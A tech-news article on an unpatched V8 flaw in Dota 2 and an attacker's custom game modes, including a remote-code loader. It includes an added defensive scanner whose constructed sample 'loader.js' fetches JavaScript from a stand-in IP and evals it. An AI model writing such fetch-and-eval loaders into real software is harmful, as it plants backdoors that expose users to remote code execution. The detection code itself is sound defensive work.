Valve left a security flaw in Dota 2 for two years until someone tried to exploit it

In context: Launched in 2013, Dota 2 is still one of the most popular multiplayer experiences among MOBA fans. And for 15 months, tens of millions of Dota 2 players were potentially vulnerable to remote code execution attacks because of Valve's carelessness.

Valve is notorious for taking its sweet time making a new Half-Life game (actually, any new game) or counting up to three. The digital distribution giant co-founded by Gabe Newell is apparently just as lax when it comes to dangerous security vulnerabilities, putting players of one of its most popular titles at risk and letting hackers go wild with their malicious experiments.

The free-to-play MOBA Dota 2 is still extremely popular even though it was originally released almost 10 years ago, on July 9, 2013. Like many other games, Dota 2 embeds a build of the V8 JavaScript engine that Google develops for the Chrome/Chromium project. The fundamental problem is that, until recently, Valve was still shipping an outdated build of V8 compiled in December 2018.

That more than four-year-old version was riddled with potentially dangerous, publicly known security bugs. What's worse, Dota 2 did not run V8 with any sandbox protection, so a V8 memory-safety bug gave an attacker code execution in the game process itself rather than inside an isolated renderer. A bad actor could have exploited this to run malicious code remotely against Dota players. According to Avast, that is exactly what happened before Valve finally updated the V8 engine.

Avast researchers discovered that an unknown attacker was testing an exploit for CVE-2021-38003, a high-severity flaw in the V8 engine with a CVSS score of 8.8/10. At first, the attacker made a seemingly benign test by publishing a new custom game mode (a way for players to change the Dota 2 experience) with exploit code for CVE-2021-38003 embedded inside.

After that, the attacker published three other game modes using a more covert approach: a simple backdoor of only "about twenty lines of code." The backdoor could download arbitrary JavaScript from a command-and-control server over HTTP and execute it. This trick let the attacker keep the exploit code off the workshop entirely and update it at will, without submitting a new custom game mode for review and risking discovery. In other words, the published game mode was just a loader that dynamically executed whatever JavaScript the server returned (most likely the CVE-2021-38003 exploit) in the background.
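The backdoor shape described above, remote fetch feeding a dynamic-code sink, is something a workshop reviewer or a defender can look for mechanically. The following is an added example written for this page, not code from the original article, from Avast, or from Valve: a small heuristic scanner that flags a script when a network-request call and an `eval`-style sink appear in the same file, and reports any literal remote URLs it finds (a C2 address usually shows up as one). The API names it looks for, including the `$.AsyncWebRequest` helper name used in the constructed samples, are assumptions made for illustration; the real Panorama API surface and the exact code Avast analysed are not on this page.

```javascript
// Added example (not the article's, Avast's, or Valve's code).
// Heuristic scanner for the "download-and-eval" loader pattern: a custom game
// mode script that pulls JavaScript from a remote host over HTTP and hands it
// to a dynamic-code sink. All API names below are assumptions for illustration.

// Network sources: calls that can bring bytes in from a remote server.
const NETWORK_SOURCES = [
  /\bfetch\s*\(/,
  /\bXMLHttpRequest\b/,
  /\$\.AsyncWebRequest\s*\(/,   // assumed Panorama-style helper name
  /\bWebSocket\s*\(/,
];

// Dynamic-code sinks: anything that turns a string into executable JS.
const CODE_SINKS = [
  /\beval\s*\(/,
  /\bnew\s+Function\s*\(/,
  /\bset(?:Timeout|Interval)\s*\(\s*["'`]/,  // timers given a string body
];

// Literal URLs pointing off-host.
const REMOTE_URL = /https?:\/\/[^\s"'`]+/g;

// Remove // and /* */ comments without touching string literals, so a URL
// such as "http://..." inside quotes survives (a naive regex would cut it).
function stripComments(src) {
  let out = '', i = 0, quote = null;
  while (i < src.length) {
    const c = src[i], n = src[i + 1];
    if (quote) {
      out += c;
      if (c === '\\') { out += (n || ''); i += 2; continue; }
      if (c === quote) quote = null;
      i++;
    } else if (c === '/' && n === '/') {
      while (i < src.length && src[i] !== '\n') i++;
    } else if (c === '/' && n === '*') {
      const end = src.indexOf('*/', i + 2);
      i = end === -1 ? src.length : end + 2;
    } else {
      if (c === '"' || c === "'" || c === '`') quote = c;
      out += c;
      i++;
    }
  }
  return out;
}

// Returns a verdict object for one script body.
function scanScript(name, src) {
  const code = stripComments(src);
  const sources = NETWORK_SOURCES.filter(re => re.test(code)).map(re => re.source);
  const sinks = CODE_SINKS.filter(re => re.test(code)).map(re => re.source);
  const urls = code.match(REMOTE_URL) || [];
  // Source + sink in one file is the loader shape. A sink alone is common in
  // legitimate UI code (templating), so it only earns a human look.
  let verdict = 'clean';
  if (sources.length && sinks.length) verdict = 'suspicious';
  else if (sinks.length) verdict = 'review';
  return { name, verdict, sources, sinks, urls };
}

function scanAll(files) {
  return Object.entries(files).map(([name, src]) => scanScript(name, src));
}

// Constructed sample inputs (not real game-mode files).
const SAMPLES = {
  // Ordinary UI code: talks to the network, never executes what it receives.
  'scoreboard.js': `
    $.AsyncWebRequest("https://example.invalid/stats", {
      type: "GET",
      success: function (data) { $("#score").text = data.score; }
    });
  `,
  // Loader shape: fetch text from a remote host and eval it, on a timer.
  'loader.js': `
    function tick() {
      $.AsyncWebRequest("http://203.0.113.7/p.js", {  // constructed C2 address
        type: "GET",
        success: function (body) { eval(body); }
      });
    }
    $.Schedule(1.0, tick);
  `,
  // Dynamic code but no network: worth a look, not an alert.
  'template.js': `
    const render = new Function("ctx", "return 'Hello ' + ctx.name;");
  `,
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of scanAll(SAMPLES)) {
    console.log(`${r.name}: ${r.verdict}`, r.urls.join(' '));
  }
}
```

This is a triage filter, not a proof of malice: a determined author can split the source and the sink across files, hide the URL behind string concatenation, or reach a sink through an indirection the regexes don't know about. Its value is that the exact shape Avast described, twenty lines that fetch and execute, is cheap to catch at submission time rather than after the exploit has already landed on players' machines.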

Google patched CVE-2021-38003 in October 2021. The unknown attacker started experimenting in March 2022, and Dota 2's developers did not fix the issue until January 2023, when Avast informed them of its findings. Further analysis looking for other exploits turned up nothing, and the true motivations of the Dota 2 attacker remain unknown.
